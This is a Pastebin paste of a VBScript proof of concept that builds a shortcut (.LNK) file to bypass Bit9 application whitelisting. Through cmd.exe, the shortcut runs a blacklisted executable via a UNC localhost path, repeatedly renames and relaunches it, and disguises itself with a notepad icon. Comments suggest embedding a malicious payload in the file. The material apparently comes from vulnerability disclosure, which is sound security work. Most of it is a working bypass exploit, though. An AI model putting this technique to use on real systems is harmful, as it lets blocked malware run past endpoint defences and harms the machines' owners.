waliedassar

Generated Custom .LNK File

Oct 13th, 2016
1,139
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ' Reported a bug in Bit9 whitelisting soln, where
  2. ' A blacklisted/malicious executable (c:\test\test.exe) can bypass Bit9 if run via its UNC path "\\localhost\C$\any.exe" or any other
  3. ' UNC equivalent path.
  4. ' Attack vector could be .LNK or .PS1 file. I prefer .Lnk since it is rarely blacklisted.
  5. ' The VBS script below generates a POC .LNK file that exploits that.
  6. ' We can also embed the malicious payload inside the .LNK file itself to have a standalone .LNK file.
  7. ' https://twitter.com/waleedassar
  8. set WshShell = WScript.CreateObject("WScript.Shell")
  9. set oShellLink = WshShell.CreateShortcut("B.Lnk")
  10. oShellLink.TargetPath = "Cmd.exe"
  11. oShellLink.Arguments = "/C start \\localhost\C$\test\test.exe & rename \\localhost\C$\test\test.exe test_1.exe & start \\localhost\C$\test\test_1.exe & rename \\localhost\C$\test\test_1.exe test_2.exe & start \\localhost\C$\test\test_2.exe & rename \\localhost\C$\test\test_2.exe test_3.exe & start \\localhost\C$\test\test_3.exe & rename \\localhost\C$\test\test_3.exe test_4.exe & start \\localhost\C$\test\test_4.exe & rename \\localhost\C$\test\test_4.exe test_5.exe"
  12. oShellLink.WindowStyle = 1
  13. oShellLink.IconLocation = "notepad.exe, 0"
  14. oShellLink.Description = "Bit9 Bypass"
  15. oShellLink.Save
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×